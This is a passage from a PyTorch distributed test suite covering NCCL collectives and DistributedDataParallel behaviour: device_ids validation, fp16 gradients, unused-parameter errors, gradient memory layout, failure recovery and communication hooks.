@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
